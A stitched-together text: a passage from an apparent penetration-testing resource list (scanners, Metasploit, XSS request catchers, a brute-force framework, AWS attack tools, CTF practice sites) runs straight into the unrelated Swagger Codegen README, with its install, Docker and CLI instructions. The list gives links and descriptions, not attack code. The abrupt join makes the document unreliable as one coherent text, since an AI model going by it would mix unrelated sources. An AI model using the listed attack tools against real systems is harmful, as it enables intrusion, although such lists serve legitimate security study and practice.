* [Acunetix](https://www.acunetix.com/web-vulnerability-scanner/) (4.5k+ / year): Web app security scanner
* [Metasploit](https://www.metasploit.com/) (15k+ / year (?), community and dev / research versions available): Penetration testing framework by Rapid7
* [Meterpreter Basics](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/)
* [Nessus](https://www.tenable.com/downloads/nessus): Was OpenSource, now commercial (Euro 2470 / year), free for home & limited training use. Updates vuln. database using plugins.
* [DomListener](https://chrome.google.com/webstore/detail/domlistener/jlfdgnlpibogjanomigieemaembjeolj?hl=en) Chrome extension that listens to DOM-changes (eg. for DOM-bases XSS detection)
* [Requestbin.com](https://requestbin.com) for dumping requests of XSS
* [Beecepter](https://beeceptor.com/) for intercepting requests of XSS
* [Uguu](https://uguu.se) for temporary file hosting (Javascript, image etc.)
* [XSS Hunter](https://xsshunter.com/): Service to assist in XSS attacks with exploit-hosting, Payload probes etc.
* [myBFF](https://github.com/MooseDojo/myBFF) a Bruteforce Framework, Bruteforces:
* HP SiteScope (will attempt to give you a Meterpreter Shell!)
* Citrix Gateway (also enumerates authorized applications)
* Juniper Portal (Will look for 2FA bypass and list what is accessible)
* MobileIron (Unknown. Have to find out what is accessible first!)
* Outlook/Office365 (will parse email, contacts, and other data from email)
* Wordpress (Will be adding "SomethingCool" soon)
* CiscoVPN (Enumerate User accounts (May not work on all configurations))
* Okta (Enumerate Applications and check if 2FA is setup for account)
* Jenkins (Will be adding "Something Cool" soon)
* SMB (Check if user is an administrator) (must use --domain with this module. for host, use smb://)
* FTP (List root dir contents)
* [JavaScript deobfuscator](https://lelinhtinh.github.io/de4js/) and unpacker
## API's
* [Swagger-EZ](https://github.com/RhinoSecurityLabs/Swagger-EZ) pentesting API's using OpenAPI definitions
## Cloud
* Lots of [resources](https://github.com/toniblyx/SANSCloudSecuritySummit2018) including tools and blogs
* [CloudCopy](https://github.com/Static-Flow/CloudCopy): Cloud version of the Shadow Copy attack against domain controllers running in AWS using only the EC2:CreateSnapshot permission
* [Cloud-Custodian](https://github.com/cloud-custodian/cloud-custodian): Rules engine for cloud security, cost optimization, and governance, DSL in yaml for policies to query, filter, and take actions on resources
* [Cloudfrunt](https://github.com/MindPointGroup/cloudfrunt)
* [Cloudjack](https://github.com/prevade/cloudjack)
* [Cloud-Nuke](https://github.com/gruntwork-io/cloud-nuke): A tool for cleaning up your cloud accounts by nuking (deleting) all resources within it
* [CloudSploit](https://github.com/cloudsploit): Cloud security configuration monitoring
* [Cred Scanner](https://github.com/disruptops/cred_scanner)
* [DumpsterDiver](https://github.com/securing/DumpsterDiver): Tool to search secrets in various filetypes, like keys (e.g. AWS Access Key, Azure Share Key or SSH keys) or passwords.
* [edda](https://github.com/Netflix/edda) by Netflix: Service to track changes in your cloud
* [enumerate-iam](https://github.com/andresriancho/enumerate-iam): Enumerate the permissions associated with AWS credential set
* [GCP Google Storage Brute-forcing](https://github.com/RhinoSecurityLabs/GCPBucketBrute): Enumerates Google Storage buckets
* [GitLeaks](https://github.com/zricethezav/gitleaks): Audit git repos for secrets
* [Mad-King](https://github.com/ThreatResponse/mad-king): Proof of Concept Zappa Based AWS Persistence and Attack Platform
* [MozDef: The Mozilla Defense Platform](https://github.com/mozilla/MozDef): The Mozilla Defense Platform (MozDef) seeks to automate the security incident handling process and facilitate the real-time activities of incident handlers.
* [Nimbostratus](https://github.com/andresriancho/nimbostratus)
* [Security Monkey](https://github.com/Netflix/security_monkey) by Netflix: Monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time
* [TruffleHog](https://github.com/dxa4481/truffleHog): Searches through git repositories for high entropy strings and secrets, digging deep into commit history
### Azure
* [AzureStack Tools](https://github.com/Azure/AzureStack-Tools): Scripts and tools that help customers use Azure and Azure Stack
* [Azurite](https://github.com/mwrlabs/Azurite): Enumeration and reconnaissance activities in the Microsoft Azure Cloud
* [Secure DevOps kit for Azure](https://github.com/azsk/DevOpsKit): Secure DevOps Kit for Azure. Docs found [here](https://github.com/azsk/DevOpsKit-docs)
### GCP
* [GCP Audit](https://github.com/spotify/gcp-audit): A tool for auditing security properties of GCP projects.
### AWS
* [AWS Limit Checker](https://github.com/jantman/awslimitchecker): A script and python module to check your AWS service limits and usage via boto
* [AWS PWN](https://github.com/dagrz/aws_pwn)
* [AWS Security Benchmark](https://github.com/awslabs/aws-security-benchmark): Open source demos, concept and guidance related to the AWS CIS Foundation framework
* [AWS Security Research](https://github.com/RhinoSecurityLabs/Cloud-Security-Research) by [Rhino Security Labs](http://www.rhinosecuritylabs.com/)
* [Lambdashell](http://www.lambdashell.com/): This is a simple AWS lambda function that does a straight exec. Essentially giving you a shell directly in my AWS infrastructure to just run your commands.
* [Lambda-Proxy](https://github.com/puresec/lambda-proxy/): A bridge between SQLMap and AWS Lambda, which lets you use SQLMap to natively test AWS Lambda functions for SQL Injection vulnerabilities.
* [Nimbostratus](http://andresriancho.github.io/nimbostratus/): Tools for fingerprinting and exploiting Amazon cloud infrastructures
* [Pacu](https://github.com/RhinoSecurityLabs/pacu): AWS exploitation framework
* [Prowler](https://github.com/toniblyx/prowler): AWS CIS Benchmark Tool
* [Scout2](https://github.com/nccgroup/Scout2): Security auditing tool for AWS environments
* [weirdALL](https://github.com/carnal0wnage/weirdAAL): AWS Attack Library
### Cloud Practicing
* [AWS Lambhack](https://github.com/devsecops/lambhack): A vulnerable serverless lambda application
## Practicing
* [List](https://www.blackroomsec.com/updated-hacking-challenge-site-links/) of hacking challenge sites
* [List 2](https://www.peerlyst.com/posts/resource-a-compendium-of-sites-that-you-can-practice-on-you-can-legally-hack-these-sites-karl-m-1)
* [Metasploitable2](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/): Vulnerable Linux VM for security & penetration practicing
* [Firing Range](https://public-firing-range.appspot.com/): Test bed for automated application security scanners
* [Hack the box](https://www.hackthebox.eu/): Online testing environment, accessible after completing an entry-level test
* [Root-me](https://www.root-me.org/?lang=en): Online challenges and VM to practice hacking
* [Try Hack Me](https://tryhackme.com/): Hack Challenges
* [Hack.me](https://hack.me/): Online challenges on vulnerable web-applications
* [CloudGoat](https://github.com/RhinoSecurityLabs/cloudgoat) Vulnerable by Design AWS deployment tool for CTF-style challenges on AWS
* [Pentester Labs](https://www.pentesterlab.com/): Includes some free exercises and Pro (paid) package
* [PicoCTF](https://picoctf.com/) aimed at middle and high school students
* [Hacker 101](https://www.hacker101.com/): Training for bounty-hunter by [HackerOne](https://www.hackerone.com/)
* [Tracelabs](https://www.tracelabs.org/getinvolved/ctf/) OSINT CTF on finding missing persons
* [CTFTime](https://ctftime.org/): Overview of scheduled CTF's
* [Awesome-CTF](https://github.com/apsdehal/awesome-ctf): A curated list of CTF frameworks, libraries, resources, softwares and tutorials.
* [AnarchoTechNYC](https://github.com/AnarchoTechNYC/meta/wiki/InfoSec#hacking-challenges): List of CTF's, with short description on the focus of each CTF
### Docker vulnerable containers
* BSides San Francisco:
* CTF [2017](https://github.com/BSidesSF/ctf-2017-release)
* CTF [2018](https://github.com/BSidesSF/ctf-2018-release)
* CTF [2019](https://github.com/BSidesSF/ctf-2019-release)
* CTF [2020](https://github.com/BSidesSF/ctf-2020-release)
* Collection of vulnerable [Docker Containers](https://hub.docker.com/u/vulnerables)
* Collection of vulnerable [Docker Environments](https://github.com/vulhub/vulhub)
* Damn Vulnerable Web Application Docker container [Web-DVWA](https://hub.docker.com/r/vulnerables/web-dvwa/)
* DerpCon [CTF 2020](https://github.com/runcode-ninja/DerpCon-CTF-2020)
* [Kubernetes Goat](https://github.com/madhuakula/kubernetes-goat)
* Metasploit [Vulnerability Emulator](https://hub.docker.com/r/vulnerables/metasploit-vulnerability-emulator)
* OWASP [Juice Shop](https://github.com/bkimminich/juice-shop#docker-container)
* OWASP [WebGoat](https://github.com/WebGoat/WebGoat#1-run-using-docker)
* [SecGen](https://github.com/cliffe/SecGen/): Security Scenario Generator generates randomised vulnerable systems
* Tufts University [CTF](https://github.com/mchow01/tufts-ctf-fall2014-docker#pulling-the-image-from-docker-hub) for Introduction to Computer Security
* Web Application Pentest [Lab setup](https://www.hackingarticles.in/web-application-pentest-lab-setup-using-docker/) Using Docker
* [WebSploit](https://websploit.h4cker.org/download.html)
## Docker automation for Hack-tasks
* [Docker for hackers](https://www.pentestpartners.com/security-blog/docker-for-hackers-a-pen-testers-guide/) A pentester's guide
* [Using Docker for disposable attack images](https://blog.zsec.uk/ltr101-dac/)
* [DockerAttack](https://github.com/ZephrFish/DockerAttack): Various tools and Docker images
# Firwmare scanning
* [Firmware Slap](https://github.com/ChrisTheCoolHut/Firmware_Slap): Vulnerability discovery and function similarity in firmware
## Other
* [https://Crawler.ninja](Crawler.ninja): Security Statistics on top 1 million Alexa sites
## Reporting
* Screenshots and editing:
* Greenshot
* Flameshot
* Notes
* Keepnote (Discontinued)
* Cherrytree
---------------
Sources:
* [Virtual training company](https://www.youtube.com/watch?v=wWKbQIfEGrQ&index=2&list=PL_pOCSwlf9XkyacNSmF5ZtjeMeP4ap8KI)
* [Guru99](https://www.guru99.com/ethical-hacking-tutorials.html)
|
# Swagger Code Generator
- Master (2.4.0): [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)
[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)
[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)
[![Java Test](https://circleci.com/gh/swagger-api/swagger-codegen.svg?style=shield)](https://circleci.com/gh/swagger-api/swagger-codegen)
- 3.0.0: [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/3.0.0.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)
[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea/3.0.0.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)
[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=3.0.0&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)
[![Java Test](https://circleci.com/gh/swagger-api/swagger-codegen/tree/3.0.0.svg?style=shield)](https://circleci.com/gh/swagger-api/swagger-codegen)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project)
[![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen)
:star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22).:star::star::star:
:notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover:
:warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning:
:rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket:
:notebook_with_decorative_cover: The eBook [A Beginner's Guide to Code Generation for REST APIs](https://gumroad.com/l/swagger_codegen_beginner) is a good starting point for begineers.
## Overview
This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported:
- **API clients**: **ActionScript**, **Ada**, **Apex**, **Bash**, **C#** (.net 2.0, 3.5 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Elm**, **Eiffel**, **Erlang**, **Go**, **Groovy**, **Haskell** (http-client, Servant), **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign, RestTemplate, RESTEasy, Vertx, Google API Client Library for Java, Rest-assured), **Kotlin**, **Lua**, **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **PowerShell**, **Python**, **R**, **Ruby**, **Rust** (rust, rust-server), **Scala** (akka, http4s, swagger-async-httpclient), **Swift** (2.x, 3.x, 4.x), **Typescript** (Angular1.x, Angular2.x, Fetch, jQuery, Node)
- **Server stubs**: **Ada**, **C#** (ASP.NET Core, NancyFx), **C++** (Pistache, Restbed), **Erlang**, **Go**, **Haskell** (Servant), **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy, Play Framework, [PKMST](https://github.com/ProKarma-Inc/pkmst-getting-started-examples)), **Kotlin**, **PHP** (Lumen, Slim, Silex, [Symfony](https://symfony.com/), [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Rust** (rust-server), **Scala** ([Finch](https://github.com/finagle/finch), [Lagom](https://github.com/lagom/lagom), Scalatra)
- **API documentation generators**: **HTML**, **Confluence Wiki**
- **Configuration files**: [**Apache2**](https://httpd.apache.org/)
- **Others**: **JMeter**
Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project.
# Table of contents
- [Swagger Code Generator](#swagger-code-generator)
- [Overview](#overview)
- [Table of Contents](#table-of-contents)
- Installation
- [Compatibility](#compatibility)
- [Prerequisites](#prerequisites)
- [OS X Users](#os-x-users)
- [Building](#building)
- [Docker](#docker)
- [Development in Docker](#development-in-docker)
- [Run docker in Vagrant](#run-docker-in-vagrant)
- [Public Docker image](#public-docker-image)
- [Homebrew](#homebrew)
- [Getting Started](#getting-started)
- Generators
- [To generate a sample client library](#to-generate-a-sample-client-library)
- [Generating libraries from your server](#generating-libraries-from-your-server)
- [Modifying the client library format](#modifying-the-client-library-format)
- [Making your own codegen modules](#making-your-own-codegen-modules)
- [Where is Javascript???](#where-is-javascript)
- [Generating a client from local files](#generating-a-client-from-local-files)
- [Customizing the generator](#customizing-the-generator)
- [Validating your OpenAPI Spec](#validating-your-openapi-spec)
- [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation)
- [Generating static html api documentation](#generating-static-html-api-documentation)
- [To build a server stub](#to-build-a-server-stub)
- [To build the codegen library](#to-build-the-codegen-library)
- [Workflow Integration](#workflow-integration)
- [Maven Integration](#maven-integration)
- [Gradle Integration](#gradle-integration)
- [Github Integration](#github-integration)
- [Online Generators](#online-generators)
- [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md#guidelines-for-contributing)
- [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen)
- [Presentations/Videos/Tutorials/Books](#presentationsvideostutorialsbooks)
- [Swagger Codegen Core Team](#swagger-codegen-core-team)
- [Swagger Codegen Technical Committee](#swagger-codegen-technical-committee)
- [License](#license)
## Compatibility
The OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification:
Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes
-------------------------- | ------------ | -------------------------- | -----
3.0.0 (upcoming major release) [SNAPSHOT](https://oss.sonatype.org/content/repositories/snapshots/io/swagger/swagger-codegen-cli/3.0.0-SNAPSHOT/)| TBD | 1.0, 1.1, 1.2, 2.0, 3.0 | Major release with breaking changes
2.4.0 (current master, upcoming minor release) [SNAPSHOT](https://oss.sonatype.org/content/repositories/snapshots/io/swagger/swagger-codegen-cli/2.4.0-SNAPSHOT/)| TBD | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes
[2.3.1](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.3.1) (**current stable**) | 2018-01-17 | 1.0, 1.1, 1.2, 2.0 | [tag v2.3.1](https://github.com/swagger-api/swagger-codegen/tree/v2.3.1)
[2.3.0](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.3.0) | 2017-12-21 | 1.0, 1.1, 1.2, 2.0 | [tag v2.3.0](https://github.com/swagger-api/swagger-codegen/tree/v2.3.0)
[2.2.3](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.3) | 2017-07-15 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.3](https://github.com/swagger-api/swagger-codegen/tree/v2.2.3)
[2.2.2](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.2) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2)
[2.2.1](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.1) | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1)
[2.1.6](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.1.6) | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6)
2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/2.0.17)
1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1)
### Prerequisites
If you're looking for the latest stable version, you can grab it directly from Maven.org (Java 7 runtime at a minimum):
```sh
wget http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.3.1/swagger-codegen-cli-2.3.1.jar -O swagger-codegen-cli.jar
java -jar swagger-codegen-cli.jar help
```
For Windows users, you will need to install [wget](http://gnuwin32.sourceforge.net/packages/wget.htm) or you can use Invoke-WebRequest in PowerShell (3.0+), e.g. `Invoke-WebRequest -OutFile swagger-codegen-cli.jar http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.3.1/swagger-codegen-cli-2.3.1.jar`
On a mac, it's even easier with `brew`:
```sh
brew install swagger-codegen
```
To build from source, you need the following installed and available in your `$PATH:`
* [Java 7 or 8](http://java.oracle.com)
* [Apache maven 3.3.3 or greater](http://maven.apache.org/)
#### OS X Users
Don't forget to install Java 7 or 8. You probably have 1.6.
Export `JAVA_HOME` in order to use the supported Java version:
```sh
export JAVA_HOME=`/usr/libexec/java_home -v 1.8`
export PATH=${JAVA_HOME}/bin:$PATH
```
### Building
After cloning the project, you can build it from source with this command:
```sh
mvn clean package
```
If you don't have maven installed, you may directly use the included [maven wrapper](https://github.com/takari/maven-wrapper), and build with the command:
```sh
./mvnw clean package
```
### Homebrew
To install, run `brew install swagger-codegen`
Here is an example usage:
```sh
swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/
```
### Docker
#### Development in docker
You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen`
in the docker container. It also maps `~/.m2/repository` to the appropriate container location.
To execute `mvn package`:
```sh
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
./run-in-docker.sh mvn package
```
Build artifacts are now accessible in your working directory.
Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example:
```sh
./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli
./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli
./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client
./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \
-l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore
```
#### Run Docker in Vagrant
Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads).
```sh
git clone http://github.com/swagger-api/swagger-codegen.git
cd swagger-codegen
vagrant up
vagrant ssh
cd /vagrant
./run-in-docker.sh mvn package
```
#### Public Pre-built Docker images
- https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service)
- https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI)
##### Swagger Generator Docker Image
The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code.
Example usage (note this assumes `jq` is installed for command line processing of JSON):
```sh
# Start container and save the container id
CID=$(docker run -d swaggerapi/swagger-generator)
# allow for startup
sleep 5
# Get the IP of the running container
GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID)
# Execute an HTTP request and store the download link
RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"')
# Download the generated zip and redirect to a file
curl $RESULT > result.zip
# Shutdown the swagger generator image
docker stop $CID && docker rm $CID
```
In the example above, `result.zip` will contain the generated client.
##### Swagger Codegen CLI Docker Image
The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version.
To generate code with this image, you'll need to mount a local location as a volume.
Example:
```sh
docker run --rm -v ${PWD}:/local swaggerapi/swagger-codegen-cli generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l go \
-o /local/out/go
```
The generated code will be located under `./out/go` in the current directory.
## Getting Started
To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following
```sh
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
mvn clean package
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l php \
-o /var/tmp/php_api_client
```
(if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`)
You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.3.1/swagger-codegen-cli-2.3.1.jar)
To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate`
To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php`
## Generators
### To generate a sample client library
You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows:
```sh
./bin/java-petstore.sh
```
(On Windows, run `.\bin\windows\java-petstore.bat` instead)
This will run the generator with this command:
```sh
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java
```
with a number of options. You can get the options with the `help generate` command (below only shows partial results):
```
NAME
swagger-codegen-cli generate - Generate code with chosen lang
SYNOPSIS
swagger-codegen-cli generate
[(-a <authorization> | --auth <authorization>)]
[--additional-properties <additional properties>...]
[--api-package <api package>] [--artifact-id <artifact id>]
[--artifact-version <artifact version>]
[(-c <configuration file> | --config <configuration file>)]
[-D <system properties>...] [--git-repo-id <git repo id>]
[--git-user-id <git user id>] [--group-id <group id>]
[--http-user-agent <http user agent>]
(-i <spec file> | --input-spec <spec file>)
[--ignore-file-override <ignore file override location>]
[--import-mappings <import mappings>...]
[--instantiation-types <instantiation types>...]
[--invoker-package <invoker package>]
(-l <language> | --lang <language>)
[--language-specific-primitives <language specific primitives>...]
[--library <library>] [--model-name-prefix <model name prefix>]
[--model-name-suffix <model name suffix>]
[--model-package <model package>]
[(-o <output directory> | --output <output directory>)]
[--release-note <release note>] [--remove-operation-id-prefix]
[--reserved-words-mappings <reserved word mappings>...]
[(-s | --skip-overwrite)]
[(-t <template directory> | --template-dir <template directory>)]
[--type-mappings <type mappings>...] [(-v | --verbose)]
OPTIONS
-a <authorization>, --auth <authorization>
adds authorization headers when fetching the swagger definitions
remotely. Pass in a URL-encoded string of name:header with a comma
separating multiple values
...... (results omitted)
-v, --verbose
verbose mode
```
You can then compile and run the client, as well as unit tests against it:
```sh
cd samples/client/petstore/java
mvn package
```
Other languages have petstore samples, too:
```sh
./bin/android-petstore.sh
./bin/java-petstore.sh
./bin/objc-petstore.sh
```
### Generating libraries from your server
It's just as easy--just use the `-i` flag to point to either a server or file.
### Modifying the client library format
Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own.
You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy.
### Making your own codegen modules
If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries:
```sh
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \
-o output/myLibrary -n myClientCodegen -p com.my.company.codegen
```
This will write, in the folder `output/myLibrary`, all the files you need to get started, including a `README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic.
You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such:
```sh
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen
```
For Windows users, you will need to use `;` instead of `:` in the classpath, e.g.
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen
```
Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library:
```sh
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \
io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\
-i http://petstore.swagger.io/v2/swagger.json \
-o myClient
```
### Where is Javascript???
See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require
static code generation.
There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification.
:exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala.
### Generating a client from local files
If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument
to the code generator like this:
```
-i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json
```
Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane.
### Selective generation
You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output:
The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated:
```sh
# generate only models
java -Dmodels {opts}
# generate only apis
java -Dapis {opts}
# generate only supporting files
java -DsupportingFiles
# generate models and supporting files
java -Dmodels -DsupportingFiles
```
To control the specific files being generated, you can pass a CSV list of what you want:
```sh
# generate the User and Pet models only
-Dmodels=User,Pet
# generate the User model and the supportingFile `StringUtil.java`:
-Dmodels=User -DsupportingFiles=StringUtil.java
```
To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, `-DmodelTests=false` and `-DmodelDocs=false`.
These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`):
```sh
# generate only models (with tests and documentation)
java -Dmodels {opts}
# generate only models (with tests but no documentation)
java -Dmodels -DmodelDocs=false {opts}
# generate only User and Pet models (no tests and no documentation)
java -Dmodels=User,Pet -DmodelTests=false {opts}
# generate only apis (without tests)
java -Dapis -DapiTests=false {opts}
# generate only apis (modelTests option is ignored)
java -Dapis -DmodelTests=false {opts}
```
When using selective generation, _only_ the templates needed for the specific generation will be used.
### Ignore file format
Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with.
The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code.
Examples:
```sh
# Swagger Codegen Ignore
# Lines beginning with a # are comments
# This should match build.sh located anywhere.
build.sh
# Matches build.sh in the root
/build.sh
# Exclude all recursively
docs/**
# Explicitly allow files excluded by other rules
!docs/UserApi.md
# Recursively exclude directories named Api
# You can't negate files below this directory.
src/**/Api/
# When this file is nested under /Api (excluded above),
# this rule is ignored because parent directory is excluded by previous rule.
!src/**/PetApiTests.cs
# Exclude a single, nested file explicitly
src/IO.Swagger.Test/Model/AnimalFarmTests.cs
```
The `.swagger-codegen-ignore` file must exist in the root of the output directory.
Upon first code generation, you may also pass the CLI option `--ignore-file-override=/path/to/ignore_file` for greater control over generated outputs. Note that this is a complete override, and will override the `.swagger-codegen-ignore` file in an output directory when regenerating code.
Editor support for `.swagger-codegen-ignore` files is available in IntelliJ via the [.ignore plugin](https://plugins.jetbrains.com/plugin/7495--ignore).
### Customizing the generator
There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc:
```sh
$ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/
AbstractJavaJAXRSServerCodegen.java
AbstractTypeScriptClientCodegen.java
... (results omitted)
TypeScriptAngularClientCodegen.java
